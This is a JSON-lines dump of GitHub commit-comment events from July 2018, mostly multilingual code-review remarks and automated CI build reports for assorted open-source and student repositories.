{"id":"7949597129","type":"CommitCommentEvent","actor":{"login":"ononoman"},"repo":{"name":"minimal-manifest-twrp/READ_ME_FIRST"},"payload":{"comment":{"id":29669932,"position":null,"line":null,"path":null,"commit_id":"9b3e81c83e433e38f081902c5eb77e624938e9a0","created_at":"2018-07-11T11:58:59Z","updated_at":"2018-07-11T11:58:59Z","author_association":"NONE","body":"Good"}},"created_at":"2018-07-11T11:58:59Z"}
{"id":"7949597858","type":"CommitCommentEvent","actor":{"login":"ezenko"},"repo":{"name":"colours/nhtv"},"payload":{"comment":{"id":29669933,"position":null,"line":null,"path":null,"commit_id":"f4c0455c9a2330a3907eb2d974d049827d6d2ca1","created_at":"2018-07-11T11:59:09Z","updated_at":"2018-07-11T11:59:09Z","author_association":"NONE","body":"Created multidev environment [nhtv#ci-265](https://dashboard.pantheon.io/sites/a5faca03-4b4c-4936-95b8-6410ab7b2c55#ci-265).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-265-nhtv.pantheonsite.io/)"}},"created_at":"2018-07-11T11:59:09Z"}
{"id":"7949599629","type":"CommitCommentEvent","actor":{"login":"yanmarkman"},"repo":{"name":"MISL-EBU-System-SW/mainline-public"},"payload":{"comment":{"id":29669936,"position":5,"line":3280,"path":"drivers/net/ethernet/marvell/mvpp2/mvpp2_main.c","commit_id":"a7a1f2165a65ccb46cf2bb659b604987ffbf9ba7","created_at":"2018-07-11T11:59:30Z","updated_at":"2018-07-11T11:59:30Z","author_association":"NONE","body":"The parameter PRIV is not used. \r\nLet's \r\n  OR remove it\r\n  OR (my opinion) change the \"mvpp2 *priv\"  onto the \"mvpp2_port *port\" fur future per/port dependency.\r\n"}},"created_at":"2018-07-11T11:59:30Z"}
{"id":"7949604701","type":"CommitCommentEvent","actor":{"login":"akbertram"},"repo":{"name":"bedatadriven/activityinfo"},"payload":{"comment":{"id":29669947,"position":null,"line":null,"path":null,"commit_id":"5e640879e8c45ca921e3fc81720700b11655965c","created_at":"2018-07-11T12:00:30Z","updated_at":"2018-07-11T12:00:30Z","author_association":"MEMBER","body":"Some TableColumns can produce multiple excel columns, like the GeoPoint field. You need to check TableColumn.getExportedColumns(), the same as in the UI."}},"created_at":"2018-07-11T12:00:30Z"}
{"id":"7949606429","type":"CommitCommentEvent","actor":{"login":"jasonxiaohan"},"repo":{"name":"jasonxiaohan/DataStructure"},"payload":{"comment":{"id":29669950,"position":null,"line":null,"path":null,"commit_id":"37a29e9ee69ab0e28446ad3712a7d9c9cb0b8ac6","created_at":"2018-07-11T12:00:51Z","updated_at":"2018-07-11T12:00:51Z","author_association":"OWNER","body":"ArrayQueue,time：18.415491877806662s\r\nLoopQueue,time：0.11190128030351687s\r\nCannot dequeue from an empty queue.\r\nLinkedListQueue,time：0.07302366804602656s"}},"created_at":"2018-07-11T12:00:51Z"}
{"id":"7949607188","type":"CommitCommentEvent","actor":{"login":"adl"},"repo":{"name":"jurajmajor/ltl3tela"},"payload":{"comment":{"id":29669955,"position":54,"line":218,"path":"main.cpp","commit_id":"834d848104dc615d4395c78c7b11c096c04547b4","created_at":"2018-07-11T12:01:00Z","updated_at":"2018-07-11T12:01:00Z","author_association":"NONE","body":"If the two automata have the same number of states, you can order by determinism and then number of acceptance sets."}},"created_at":"2018-07-11T12:01:00Z"}
{"id":"7949607808","type":"CommitCommentEvent","actor":{"login":"rchl"},"repo":{"name":"resoai/TileBoard"},"payload":{"comment":{"id":29669957,"position":10,"line":506,"path":"scripts/controllers/main.js","commit_id":"133fa537660758384e843bcc3404b719100afcf3","created_at":"2018-07-11T12:01:08Z","updated_at":"2018-07-11T12:01:08Z","author_association":"NONE","body":"Should be `iconImage` instead of `item.icons`.\r\n\r\nAlso I would have this block as 'else if' to make things clearer as it's either that item.icons is a function or object."}},"created_at":"2018-07-11T12:01:08Z"}
{"id":"7949608750","type":"CommitCommentEvent","actor":{"login":"HerrNorbert"},"repo":{"name":"green-fox-academy/lugosidomotor"},"payload":{"comment":{"id":29669960,"position":8,"line":8,"path":"week-08/day-05/reddit/src/main/java/com/reddit/reddit/repository/PostRepositoryimp.java","commit_id":"dd2355bf0eac9b319a0d3b59080ac21e29801f89","created_at":"2018-07-11T12:01:19Z","updated_at":"2018-07-11T12:01:19Z","author_association":"NONE","body":"Unfortunately it is not a `@Service`, it is a `@Repository`, and you should let the framework to implement the repository. In the repo we can write custom queries easily if we follow the naming convention because the framework will find out and make the implementation instead of us magically :)"}},"created_at":"2018-07-11T12:01:19Z"}
{"id":"7949612084","type":"CommitCommentEvent","actor":{"login":"Evgeny-"},"repo":{"name":"resoai/TileBoard"},"payload":{"comment":{"id":29669974,"position":10,"line":506,"path":"scripts/controllers/main.js","commit_id":"133fa537660758384e843bcc3404b719100afcf3","created_at":"2018-07-11T12:01:57Z","updated_at":"2018-07-11T12:01:57Z","author_association":"COLLABORATOR","body":"First one already fixed, second one isn't necessary. "}},"created_at":"2018-07-11T12:01:57Z"}
{"id":"7949614311","type":"CommitCommentEvent","actor":{"login":"kinjo-icolle"},"repo":{"name":"n18023/programming-term2"},"payload":{"comment":{"id":29669981,"position":null,"line":null,"path":null,"commit_id":"2d4c7c52696e2df3791a2b08875a001776aef970","created_at":"2018-07-11T12:02:25Z","updated_at":"2018-07-11T12:02:25Z","author_association":"NONE","body":"メソッドを使う形にしてるんですねー、なるほど!\r\nとりあえず大きく気になったところで指摘です。\r\n14行目と16行目のインデントが下がりすぎですね。ちょっとコードとして美しくないです。\r\nifやelif,elseの条件下で実行されるコードは1ブロック(スペース4つ)分のインデントにしましょう。\r\n\r\nあと、細かいところですが。。。\r\n・display()メソッドの中身が結局print()に引数を渡しているだけなので、ちょっと冗長化しているような。\r\n　これなら12,14,16行目はprint()で表示すれば良いのでは?と僕は思いました。\r\n・結果のメッセージですが、エラーの場合以外はほぼ一緒なので、「グー」「チョキ」「パー」の部分だけ、formatメソッドで差し替えるとちょっとスッキリ見えるかもしれません。"}},"created_at":"2018-07-11T12:02:25Z"}
{"id":"7949619464","type":"CommitCommentEvent","actor":{"login":"limdayoung"},"repo":{"name":"limdayoung/TIL"},"payload":{"comment":{"id":29669991,"position":null,"line":null,"path":null,"commit_id":"ea5c80e69311f185f47a93fb1ed4efac7620ba97","created_at":"2018-07-11T12:03:30Z","updated_at":"2018-07-11T12:03:30Z","author_association":"OWNER","body":"댓글"}},"created_at":"2018-07-11T12:03:30Z"}
{"id":"7949620577","type":"CommitCommentEvent","actor":{"login":"PavelVais"},"repo":{"name":"PavelVais/RecruitisAPI"},"payload":{"comment":{"id":29669997,"position":null,"line":null,"path":null,"commit_id":"706ef655c2f745ed6f913234b7051945daea02eb","created_at":"2018-07-11T12:03:45Z","updated_at":"2018-07-11T12:03:45Z","author_association":"OWNER","body":"__API Description file syntax error on line 1__: expected API name, e.g. '# <API Name>' (Autogenerated message from apiary.io)"}},"created_at":"2018-07-11T12:03:45Z"}
{"id":"7949632178","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"ivowillemsen/b9lab-remittance"},"payload":{"comment":{"id":29670024,"position":130,"line":114,"path":"contracts/Remittance.sol","commit_id":"207c48ae10d1664841e3b61101b01182ac77507a","created_at":"2018-07-11T12:06:13Z","updated_at":"2018-07-11T12:06:13Z","author_association":"NONE","body":"When the 2 messages are sent does not matter. There is zero interaction between the 2 transactions being sent to 2 different contract instances."}},"created_at":"2018-07-11T12:06:13Z"}
{"id":"7949632370","type":"CommitCommentEvent","actor":{"login":"HerrNorbert"},"repo":{"name":"green-fox-academy/lugosidomotor"},"payload":{"comment":{"id":29670025,"position":33,"line":33,"path":"week-08/day-05/reddit/src/main/java/com/reddit/reddit/controller/HomeController.java","commit_id":"dd2355bf0eac9b319a0d3b59080ac21e29801f89","created_at":"2018-07-11T12:06:15Z","updated_at":"2018-07-11T12:06:15Z","author_association":"NONE","body":"It is a good temp workaround until we don't have a database, but the`Post` model has got a constructor with parameters. I would use that instead of setters and directly to the list.\r\n`posts.add(new Post(\"title\", \"comment\", \"author\"));`"}},"created_at":"2018-07-11T12:06:15Z"}
{"id":"7949633606","type":"CommitCommentEvent","actor":{"login":"ml054"},"repo":{"name":"ml054/ravendb"},"payload":{"comment":{"id":29670030,"position":44,"line":151,"path":"src/Raven.Studio/typescript/models/database/index/indexFieldOptions.ts","commit_id":"5f037424357b51a4a53aa36f30508e590766b918","created_at":"2018-07-11T12:06:30Z","updated_at":"2018-07-11T12:06:30Z","author_association":"OWNER","body":"why ?"}},"created_at":"2018-07-11T12:06:30Z"}
{"id":"7949634833","type":"CommitCommentEvent","actor":{"login":"arduino-ci-script-bot"},"repo":{"name":"per1234/arduino-ci-script"},"payload":{"comment":{"id":29670036,"position":null,"line":null,"path":null,"commit_id":"b33f9487952fa6a2ac19a2cc28fe3c6c04b28be2","created_at":"2018-07-11T12:06:44Z","updated_at":"2018-07-11T12:06:44Z","author_association":"NONE","body":"Once completed, the job reports for Travis CI [build 719](https://travis-ci.org/per1234/arduino-ci-script/builds/402623477) will be found at:\nhttps://gist.github.com/arduino-ci-script-bot/9371a7dedb73a560142ff2ca514b79db#file-travis_ci_job_report_00719-001-tsv"}},"created_at":"2018-07-11T12:06:44Z"}
{"id":"7949635257","type":"CommitCommentEvent","actor":{"login":"arduino-ci-script-bot"},"repo":{"name":"per1234/arduino-ci-script"},"payload":{"comment":{"id":29670037,"position":null,"line":null,"path":null,"commit_id":"b33f9487952fa6a2ac19a2cc28fe3c6c04b28be2","created_at":"2018-07-11T12:06:50Z","updated_at":"2018-07-11T12:06:50Z","author_association":"NONE","body":"Once completed, the job reports for Travis CI [build 719](https://travis-ci.org/per1234/arduino-ci-script/builds/402623477) will be found at:\nhttps://github.com/per1234/CI-reports/tree/arduino-ci-script/build_00719"}},"created_at":"2018-07-11T12:06:50Z"}
{"id":"7949636546","type":"CommitCommentEvent","actor":{"login":"ml054"},"repo":{"name":"ml054/ravendb"},"payload":{"comment":{"id":29670045,"position":54,"line":246,"path":"src/Raven.Studio/typescript/models/database/index/indexFieldOptions.ts","commit_id":"5f037424357b51a4a53aa36f30508e590766b918","created_at":"2018-07-11T12:07:08Z","updated_at":"2018-07-11T12:07:08Z","author_association":"OWNER","body":"what if someone put null or fully qualified name? "}},"created_at":"2018-07-11T12:07:08Z"}
{"id":"7949637857","type":"CommitCommentEvent","actor":{"login":"ml054"},"repo":{"name":"ml054/ravendb"},"payload":{"comment":{"id":29670049,"position":54,"line":246,"path":"src/Raven.Studio/typescript/models/database/index/indexFieldOptions.ts","commit_id":"5f037424357b51a4a53aa36f30508e590766b918","created_at":"2018-07-11T12:07:22Z","updated_at":"2018-07-11T12:07:22Z","author_association":"OWNER","body":"maybe we should create method with logic that checks that"}},"created_at":"2018-07-11T12:07:22Z"}
{"id":"7949639171","type":"CommitCommentEvent","actor":{"login":"portnov"},"repo":{"name":"nortikin/sverchok"},"payload":{"comment":{"id":29670057,"position":null,"line":null,"path":null,"commit_id":"bb60670823dd76c3b96dd2b85d8b6b3e2c2c8e56","created_at":"2018-07-11T12:07:38Z","updated_at":"2018-07-11T12:07:38Z","author_association":"COLLABORATOR","body":"COPY button's text could be replaced with icon."}},"created_at":"2018-07-11T12:07:38Z"}
{"id":"7949639950","type":"CommitCommentEvent","actor":{"login":"fertapric"},"repo":{"name":"elixir-lang/elixir"},"payload":{"comment":{"id":29670060,"position":null,"line":null,"path":null,"commit_id":"43f80d382b22f03fe021206b234abdabb91b49da","created_at":"2018-07-11T12:07:48Z","updated_at":"2018-07-11T12:07:48Z","author_association":"CONTRIBUTOR","body":"Yeah, maybe it's too much :)"}},"created_at":"2018-07-11T12:07:48Z"}
{"id":"7949640501","type":"CommitCommentEvent","actor":{"login":"kinjo-icolle"},"repo":{"name":"s18011/programming-term2"},"payload":{"comment":{"id":29670061,"position":null,"line":null,"path":null,"commit_id":"d4457810f7d0916835cf8eba1605fccfbd7801a7","created_at":"2018-07-11T12:07:55Z","updated_at":"2018-07-11T12:07:55Z","author_association":"NONE","body":"まずは課題提出お疲れ様でした。\r\n口頭で伝えたもの、伝えなかったもの含め、改善点をあげますね。\r\n・変数名には意味を持たせましょう。is_taskという変数名にすると、「課題であるか」といった風になるので、まず日本語としても何が伝えたいのかよく分かりません。僕ならis_won(勝ったか)とかにします。\r\n・整数以外の文字を入力したときにエラー終了してしまします。その原因を考えて、もし余力があれば修正してみてください。"}},"created_at":"2018-07-11T12:07:55Z"}
{"id":"7949642375","type":"CommitCommentEvent","actor":{"login":"ml054"},"repo":{"name":"ml054/ravendb"},"payload":{"comment":{"id":29670065,"position":64,"line":347,"path":"src/Raven.Studio/typescript/models/database/index/indexFieldOptions.ts","commit_id":"5f037424357b51a4a53aa36f30508e590766b918","created_at":"2018-07-11T12:08:18Z","updated_at":"2018-07-11T12:08:18Z","author_association":"OWNER","body":"why do you search again ? "}},"created_at":"2018-07-11T12:08:18Z"}
{"id":"7949643592","type":"CommitCommentEvent","actor":{"login":"MarkEWaite"},"repo":{"name":"jenkinsci/git-client-plugin"},"payload":{"comment":{"id":29670067,"position":null,"line":null,"path":null,"commit_id":"dbcec24aca49797b45042dc69378d19067e4c60a","created_at":"2018-07-11T12:08:32Z","updated_at":"2018-07-11T12:08:32Z","author_association":"CONTRIBUTOR","body":"Thanks for detecting that the call to the assertion was incorrectly removed.\r\n\r\nThe change should be to insert a new method with `@After` annotation that calls checkExpectedLogSubstring."}},"created_at":"2018-07-11T12:08:32Z"}
{"id":"7949644043","type":"CommitCommentEvent","actor":{"login":"camopants"},"repo":{"name":"camopants/igandx-Responder"},"payload":{"comment":{"id":29670069,"position":null,"line":null,"path":null,"commit_id":"ffca0e2a92efd69ac47483ec44e363cb34e6567a","created_at":"2018-07-11T12:08:38Z","updated_at":"2018-07-11T12:08:38Z","author_association":"OWNER","body":"Update from upstream"}},"created_at":"2018-07-11T12:08:38Z"}
{"id":"7949646721","type":"CommitCommentEvent","actor":{"login":"Danielle9897"},"repo":{"name":"ml054/ravendb"},"payload":{"comment":{"id":29670074,"position":44,"line":151,"path":"src/Raven.Studio/typescript/models/database/index/indexFieldOptions.ts","commit_id":"5f037424357b51a4a53aa36f30508e590766b918","created_at":"2018-07-11T12:09:13Z","updated_at":"2018-07-11T12:09:13Z","author_association":"COLLABORATOR","body":"because now this is what you are supposed to see when FTS is set to 'yes'. \r\nI also changed the placeholder."}},"created_at":"2018-07-11T12:09:13Z"}
{"id":"7949649271","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29670079,"position":null,"line":null,"path":null,"commit_id":"46f14abc96336851feee32a7fc631c00ae8ef2ff","created_at":"2018-07-11T12:09:45Z","updated_at":"2018-07-11T12:09:45Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-11T12:09:45Z"}
{"id":"7949651169","type":"CommitCommentEvent","actor":{"login":"kinjo-icolle"},"repo":{"name":"n18008/programming-term2"},"payload":{"comment":{"id":29670083,"position":null,"line":null,"path":null,"commit_id":"4fa7394b56f0ef99326e393bef992f853010f624","created_at":"2018-07-11T12:10:10Z","updated_at":"2018-07-11T12:10:10Z","author_association":"NONE","body":"もう1点。\r\n2行目の\r\n\r\n> n = str(input(message))\r\n\r\nですが、inputメソッドはstr型を返すため、str()の必要は特にないですね^^;"}},"created_at":"2018-07-11T12:10:10Z"}
{"id":"7949652342","type":"CommitCommentEvent","actor":{"login":"SnShine"},"repo":{"name":"SnShine/Utilities"},"payload":{"comment":{"id":29670086,"position":null,"line":null,"path":null,"commit_id":"b8ce5386d729e2c62711a74969b39ab6995180cd","created_at":"2018-07-11T12:10:24Z","updated_at":"2018-07-11T12:10:24Z","author_association":"OWNER","body":"I'm aware of that. I've deleted those keys on AWS console. So, no problem."}},"created_at":"2018-07-11T12:10:24Z"}
{"id":"7949657540","type":"CommitCommentEvent","actor":{"login":"Sorokinsta"},"repo":{"name":"WebEducationPlatform/BackEnd"},"payload":{"comment":{"id":29670097,"position":31,"line":154,"path":"webapp/src/main/java/education/web/platform/controllers/user/CourseController.java","commit_id":"a213c11244875a6c920d67892598f691886922d5","created_at":"2018-07-11T12:11:28Z","updated_at":"2018-07-11T12:11:28Z","author_association":"CONTRIBUTOR","body":"Добавь сортировку через аннотацию @Order в классе, чтобы лист сразу доставался отсортированным"}},"created_at":"2018-07-11T12:11:28Z"}
{"id":"7949657797","type":"CommitCommentEvent","actor":{"login":"MarkEWaite"},"repo":{"name":"jenkinsci/git-client-plugin"},"payload":{"comment":{"id":29670100,"position":null,"line":null,"path":null,"commit_id":"42305b580ecd657d9bfec950716296d0b5691117","created_at":"2018-07-11T12:11:31Z","updated_at":"2018-07-11T12:11:31Z","author_association":"CONTRIBUTOR","body":"This change is a wholesale reformatting commit.  Please remove it from the pull request."}},"created_at":"2018-07-11T12:11:31Z"}
{"id":"7949659628","type":"CommitCommentEvent","actor":{"login":"Sorokinsta"},"repo":{"name":"WebEducationPlatform/BackEnd"},"payload":{"comment":{"id":29670105,"position":6,"line":132,"path":"webapp/src/main/java/education/web/platform/controllers/user/CourseController.java","commit_id":"a213c11244875a6c920d67892598f691886922d5","created_at":"2018-07-11T12:11:54Z","updated_at":"2018-07-11T12:11:54Z","author_association":"CONTRIBUTOR","body":"не оставляй коментарии, просто удали старый код"}},"created_at":"2018-07-11T12:11:54Z"}
{"id":"7949660039","type":"CommitCommentEvent","actor":{"login":"ml054"},"repo":{"name":"ml054/ravendb"},"payload":{"comment":{"id":29670106,"position":44,"line":151,"path":"src/Raven.Studio/typescript/models/database/index/indexFieldOptions.ts","commit_id":"5f037424357b51a4a53aa36f30508e590766b918","created_at":"2018-07-11T12:11:59Z","updated_at":"2018-07-11T12:11:59Z","author_association":"OWNER","body":"so let's bring it back, as null means Standard"}},"created_at":"2018-07-11T12:11:59Z"}
{"id":"7949660346","type":"CommitCommentEvent","actor":{"login":"sibelius"},"repo":{"name":"Veriown-CHS/graphql-mongoose-loader"},"payload":{"comment":{"id":29670108,"position":null,"line":null,"path":null,"commit_id":"8a9f18a3c098619362b2fd12929d568bdc5d6bc9","created_at":"2018-07-11T12:12:03Z","updated_at":"2018-07-11T12:12:03Z","author_association":"NONE","body":"reading the cursor spec https://facebook.github.io/relay/graphql/connections.htm\r\n\r\nyou should use only `first and after` and `last and before` together\r\n\r\nit does not make sense to use `first` and `before` together"}},"created_at":"2018-07-11T12:12:03Z"}
{"id":"7949661529","type":"CommitCommentEvent","actor":{"login":"ml054"},"repo":{"name":"ml054/ravendb"},"payload":{"comment":{"id":29670111,"position":44,"line":151,"path":"src/Raven.Studio/typescript/models/database/index/indexFieldOptions.ts","commit_id":"5f037424357b51a4a53aa36f30508e590766b918","created_at":"2018-07-11T12:12:18Z","updated_at":"2018-07-11T12:12:18Z","author_association":"OWNER","body":"+ we want to send this as null to server "}},"created_at":"2018-07-11T12:12:18Z"}
{"id":"7949662052","type":"CommitCommentEvent","actor":{"login":"MarkEWaite"},"repo":{"name":"jenkinsci/git-client-plugin"},"payload":{"comment":{"id":29670113,"position":null,"line":null,"path":null,"commit_id":"6b4f392d9d1eb309748c613017eccb0ba5b4eec9","created_at":"2018-07-11T12:12:24Z","updated_at":"2018-07-11T12:12:24Z","author_association":"CONTRIBUTOR","body":"This is a wholesale reformatting commit.  Please remove it from the pull request."}},"created_at":"2018-07-11T12:12:24Z"}
{"id":"7949665238","type":"CommitCommentEvent","actor":{"login":"BorjaMiranda"},"repo":{"name":"BorjaMiranda/Prueba2018"},"payload":{"comment":{"id":29670119,"position":null,"line":null,"path":null,"commit_id":"b6791a0fb82a8f7d7b7a972331eab5f6b43de933","created_at":"2018-07-11T12:13:03Z","updated_at":"2018-07-11T12:13:03Z","author_association":"OWNER","body":"holaaaa"}},"created_at":"2018-07-11T12:13:03Z"}
{"id":"7949665259","type":"CommitCommentEvent","actor":{"login":"kristofarkas"},"repo":{"name":"radical-cybertools/htbac"},"payload":{"comment":{"id":29670120,"position":20,"line":282,"path":"htbac/simulation.py","commit_id":"cedd6f9f0150917f3a4efe60927b7225ea198d3e","created_at":"2018-07-11T12:13:03Z","updated_at":"2018-07-11T12:13:03Z","author_association":"COLLABORATOR","body":"What is `lfs` and `tag`?"}},"created_at":"2018-07-11T12:13:03Z"}
{"id":"7949666141","type":"CommitCommentEvent","actor":{"login":"MacOSO"},"repo":{"name":"Puzovoz/eventhub-backend-js"},"payload":{"comment":{"id":29670125,"position":19,"line":19,"path":"app.js","commit_id":"99724d18ec4d4578293847e6a3d36bfb3db2c197","created_at":"2018-07-11T12:13:15Z","updated_at":"2018-07-11T12:13:15Z","author_association":"NONE","body":"It's not best practice, it is better to make the version controller and process the api version through it."}},"created_at":"2018-07-11T12:13:15Z"}
{"id":"7949667211","type":"CommitCommentEvent","actor":{"login":"DDT-Kibe"},"repo":{"name":"DDT-Kibe/meikai_java2018_04"},"payload":{"comment":{"id":29670130,"position":24,"line":24,"path":"meikai_java2018_05/src/e_03/e_03_01.java","commit_id":"0e717012c6e065bd7d0a4fbdb209a94382abcf2b","created_at":"2018-07-11T12:13:28Z","updated_at":"2018-07-11T12:13:28Z","author_association":"OWNER","body":"柴田さん\r\n承知しました。\r\nご指摘ありがとうございます。"}},"created_at":"2018-07-11T12:13:28Z"}
{"id":"7949669574","type":"CommitCommentEvent","actor":{"login":"Sorokinsta"},"repo":{"name":"WebEducationPlatform/BackEnd"},"payload":{"comment":{"id":29670138,"position":5,"line":40,"path":"dao-impl/src/main/java/education/web/platform/dao/StudentCourseInfoDaoImpl.java","commit_id":"a213c11244875a6c920d67892598f691886922d5","created_at":"2018-07-11T12:13:55Z","updated_at":"2018-07-11T12:13:55Z","author_association":"CONTRIBUTOR","body":"замени User на studentId - так метод станет более гибким и не будет возможности получить ClassCastExeption"}},"created_at":"2018-07-11T12:13:55Z"}
{"id":"7949671931","type":"CommitCommentEvent","actor":{"login":"MacOSO"},"repo":{"name":"Puzovoz/eventhub-backend-js"},"payload":{"comment":{"id":29670146,"position":7,"line":7,"path":"app/routes/events.js","commit_id":"99724d18ec4d4578293847e6a3d36bfb3db2c197","created_at":"2018-07-11T12:14:25Z","updated_at":"2018-07-11T12:14:25Z","author_association":"NONE","body":"Use `let` instead of `var` for local variables."}},"created_at":"2018-07-11T12:14:25Z"}
{"id":"7949677439","type":"CommitCommentEvent","actor":{"login":"alexleskov"},"repo":{"name":"alexleskov/thinknetica-learning"},"payload":{"comment":{"id":29670165,"position":15,"line":11,"path":"Lesson3/route.rb","commit_id":"8bfa7bce833b38613c1e2f2bfe6dde0397b6f1d2","created_at":"2018-07-11T12:15:34Z","updated_at":"2018-07-11T12:15:34Z","author_association":"OWNER","body":"А почему || ?\r\n\r\nЕсли stations.include?(station) даст true, а station.class != Station даст false\r\nТо условие же выполнится, хотя это будет не верно.\r\n\r\nКод ниже должен исполняться только тогда оба условия будут в true.\r\n"}},"created_at":"2018-07-11T12:15:34Z"}
{"id":"7949677676","type":"CommitCommentEvent","actor":{"login":"rob-Hitchens"},"repo":{"name":"ivowillemsen/b9lab-remittance"},"payload":{"comment":{"id":29670166,"position":80,"line":69,"path":"contracts/Remittance.sol","commit_id":"207c48ae10d1664841e3b61101b01182ac77507a","created_at":"2018-07-11T12:15:37Z","updated_at":"2018-07-11T12:15:37Z","author_association":"NONE","body":"It would be a disaster to have funds deposited with no accounting. No accounting = no way to remove it = funds destroyed. "}},"created_at":"2018-07-11T12:15:37Z"}
{"id":"7949684293","type":"CommitCommentEvent","actor":{"login":"mattfrear"},"repo":{"name":"domaindrivendev/Swashbuckle.AspNetCore"},"payload":{"comment":{"id":29670179,"position":14,"line":22,"path":"src/Swashbuckle.AspNetCore.SwaggerGen/Generator/ApiDescriptionExtensions.cs","commit_id":"c9777021ff3b7bd7900fb259779df8d3cba4e217","created_at":"2018-07-11T12:16:57Z","updated_at":"2018-07-11T12:16:57Z","author_association":"NONE","body":"I came here wondering why these methods are now marked as Obsolete. I use them and I now get compiler warnings when I compile against Swashbuckle.AspNetCore 3.0. Is there an issue which explains this change which you could point me to?"}},"created_at":"2018-07-11T12:16:57Z"}
{"id":"7949686856","type":"CommitCommentEvent","actor":{"login":"qq594495953"},"repo":{"name":"nl8590687/ASRT_SpeechRecognition"},"payload":{"comment":{"id":29670187,"position":null,"line":null,"path":null,"commit_id":"9d40bb7f242f99933ebaedb2c0dc08f38c8fb207","created_at":"2018-07-11T12:17:27Z","updated_at":"2018-07-11T12:17:27Z","author_association":"NONE","body":"如果想识别语速较快的语音该怎么处理语音特征啊"}},"created_at":"2018-07-11T12:17:27Z"}
{"id":"7949689868","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29670195,"position":null,"line":null,"path":null,"commit_id":"46f14abc96336851feee32a7fc631c00ae8ef2ff","created_at":"2018-07-11T12:18:06Z","updated_at":"2018-07-11T12:18:06Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-11T12:18:06Z"}
{"id":"7949692910","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29670201,"position":null,"line":null,"path":null,"commit_id":"d846bee7b995a60038d1ab284be4b15525c7a5fa","created_at":"2018-07-11T12:18:42Z","updated_at":"2018-07-11T12:18:42Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-11T12:18:42Z"}
{"id":"7949693153","type":"CommitCommentEvent","actor":{"login":"deletescape"},"repo":{"name":"rupansh/clone_trees"},"payload":{"comment":{"id":29670203,"position":4,"line":2,"path":"README.md","commit_id":"141bc5707814b0720399fa49b004dcdc853bc02f","created_at":"2018-07-11T12:18:45Z","updated_at":"2018-07-11T12:18:45Z","author_association":"CONTRIBUTOR","body":"Add a requirements.txt with `gitpython==<the version you used>` to make it easier to install it and simpler for python people"}},"created_at":"2018-07-11T12:18:45Z"}
{"id":"7949695978","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29670210,"position":null,"line":null,"path":null,"commit_id":"f61183cb3adbd9fc35376a2aaea2847857f8db6e","created_at":"2018-07-11T12:19:19Z","updated_at":"2018-07-11T12:19:19Z","author_association":"NONE","body":"update-libraries (mbadams5) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2970 of 2971 tests passed, 11 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n * 1 test had: EIO diffs.\n * 1 test had: ESO big diffs.\n * 1 test had: MTR big diffs.\n * 1 test had: Table big diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 642\n * Failed: 1\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f61183cb3adbd9fc35376a2aaea2847857f8db6e-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f61183cb3adbd9fc35376a2aaea2847857f8db6e-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.97%25-yellow.png)</a> \n"}},"created_at":"2018-07-11T12:19:19Z"}
